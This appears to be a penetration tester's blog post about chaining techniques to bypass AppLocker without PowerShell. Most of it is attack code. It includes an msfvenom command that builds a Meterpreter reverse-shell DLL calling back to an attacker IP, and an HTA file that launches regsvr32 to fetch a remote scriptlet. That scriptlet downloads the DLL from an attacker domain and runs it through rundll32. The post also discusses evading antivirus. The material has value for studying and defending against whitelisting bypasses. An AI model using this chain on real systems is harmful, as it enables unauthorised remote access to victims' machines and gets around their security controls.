# Chaining to Bypass AppLocker Without PowerShell

One of the services we provide at work is a “human factor penetration test”, or a social engineering engagement. We position ourselves as an attacker and treat the engagement as a completely red-team exercise to attempt to gain access to the corporate environment without being provided any knowledge of the inner workings of it. Generally speaking, environments either do not have AppLocker or any form of application whitelisting enabled, and/or have PowerShell enabled for use by all users. Recently, I encountered an environment where both of these were false. Luckily (well, for an attacker), I found it was possible to chain a number of previous attacks together in order to bypass both in one fell swoop.

msfvenom -p windows/meterpreter/reverse_tcp EXITFUNC=thread LHOST=111.111.111.111 LPORT=443 -a x86 -f dll -o out.dll


<html>
<script language="VBScript">
window.moveTo -4000, -4000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run("regsvr32 /u /n /s /i:https://your-domain.com/sct.sct scrobj.dll")
window.close()
</script>
</html>


<?XML version="1.0"?>
<scriptlet>
<registration progid="ProgramID" classid="{10001111-0000-0000-0000-0000FEEDACDC}">
<script language="VBScript">
<![CDATA[
Set FSO = CreateObject("Scripting.FileSystemObject")
Set TMPDir = FSO.GetSpecialFolder(2)

DLLDir = TMPDir & "\" & FSO.GetTempName()
FSO.CreateFolder(DLLDir)
OutFile = DLLDir & "\" & "MSFDLL.dll"

Dim XMLHTTP
Dim BinaryStream

Set XMLHTTP = CreateObject("Microsoft.XMLHTTP")

XMLHTTP.Open "GET", "https://your-domain.com/path/to/your/dll.dll", False
XMLHTTP.Send

With ByteStream
.Type = 1
.Open
.Write XMLHTTP.ResponseBody
.SaveToFile OutFile
End With

Set WSS = CreateObject("Wscript.Shell")
WSS.Run "C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL " & OutFile, 0, true
]]>
</script>
</registration>
</scriptlet>


However, some antivirii detect this, so let’s go one stage deeper and add some mitigations to their mitigations, no?

– BASE64 ENCODING EXAMPLE

Why:

• Generally VBScript is blocked from making calls such as XMLHTTP Open
• In recent cases (e.g., Windows 10) VBScript HTA is prevented from writing remote files to disk from a HTA by default
• regsvr32 does not suffer from these “limitations”
• regsvr32 can execute a “script object” from a URL
• Can be JS, but VBScript is (in the one case in the universe) slightly easier to work with

Mitigations:

• Some antivirii detect this - can be defeated by using Base64 encoding instead of pulling the file from the Internet
• I couldn’t get B64 working at the time.

Neat, huh? Having this “just work” would be - obviously - irresponsible. While you could copy and paste this code, edit the template a touch, and push it to a server and have it work, modern antivirus will detect the HTA file as being malware. It’s an exercise for the reader as to how to mitigate this.